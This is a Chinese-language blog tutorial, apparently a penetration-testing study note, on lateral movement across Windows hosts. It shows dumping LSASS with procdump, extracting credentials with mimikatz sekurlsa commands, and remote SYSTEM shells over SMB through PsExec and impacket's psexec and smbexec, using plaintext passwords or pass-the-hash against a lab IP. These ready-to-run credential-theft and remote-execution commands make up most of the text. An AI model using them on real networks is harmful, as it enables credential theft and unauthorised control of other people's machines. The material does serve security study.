• 横向移动-传递攻击SMB服务利用psexec&smbexec


    win2012以上版本,关闭了wdigest 或者安装了 KB287199补丁。无法获取明文密码

    总的来说就是win2012后无法获取明文密码

    解决办法就是:

    1.可以利用哈希hash传递(pth,ptk等进行移动)

    2.利用其他服务协议(SMB,WMI)进行哈希hash移动

    3.注册表开启wdigest Auth 进行获取明文密码

    4.利用第三方工具(hashcat)进行破解获取

    Procdump+Mimikatz获取明文密码(这个没用,mimikatz还是hash)

    Procdump是一款win官方软件,不会被杀软杀,他的主要功能就是获取hash值。并存储在lsass.dmp文件中。那么我们把软件上传到对方主机获取到hash值后用mimikatz在我们本地进行破解。

    导出lsass.dmp文件 

    procdump -accepteula -ma lsass.exe lsass.dmp

     然后使用mimikaz

    1. sekurlsa::minidump lsass.dmp
    2. sekurlsa::logonPasswords full

    这个hash破解失败。因为hash本来就是不可逆的。如果密码难度过大,撞库不成功。还是不会得到明文密码。

    所以接下来,就要介绍新的协议。

    psexec(win自带,第三方库都有)&smbexec(只有第三方库)

    利用windows上smb服务通过明文和hash传递来执行远程执行。(对方445端口开放)

    我们需要Windows自带的两款自带工具。

    psexec(pstools(win官方))和smbexec

    psexec

    这是win自带的工具包 pstools

    上传到攻击机上

    有两种使用方法

    1.先链接IPC,在使用psexec

    1. net use \\192.168.52.129\ipc$ P@ssw0rd /user:god\liukaifeng01

    1. PsExec.exe \\192.168.52.129 -s cmd
    2. PsExec.exe \\对方ip -s cmd
    3. 用PsExec.exe 连接对方 -s 是以system 创建一个 cmd窗口
    4. exit 退出

     

    使用成功

    2.不需要建立IPC连接,直接提供明文密码。

    PsExec.exe \\192.168.52.129 -u 用户名 -p 密码  -s cmd

    成功

     刚刚是用的明文密码

    现在是建立在hash值上的连接(会报错不知道啥原因)

    PsExec.exe -hashes 值  ./用户@对方IP

    然后使用第三方工具包impacket

    cmd使用

     

    psexec.exe -hashes 值  ./用户名@对方ip

    成功

    如果域用户    .  改为 域名

    smbexec(第三方库,impacket)

    它也可以建立在明文和hash上

    明文

    1. smbexec.exe ./liukaifeng01:P@ssw0rd@192.168.52.129
    2. 如果有域,.换为域名

    hash

    smbexec.exe -hashes 值 ./用户名@对方ip

     成功

     

     

     

     

     

  • 相关阅读:
    python django 小程序点餐源码
    人工智能开源社区论坛----开源助力多领域AI生态发展| ChinaOSC
    【STM32F407ZET6】图文
    操作系统 day08(进程通信)
    C. Word Game
    STM32 HAL库 利用CH376进行USB文件读写
    关于时间日期
    [Redis]Zset类型
    SAR ADC教程系列5——FFT频谱泄露以及相干采样
    怎么他们都有开源项目经历|手把手教你参与开源
  • 原文地址:https://blog.csdn.net/m0_65096687/article/details/130903088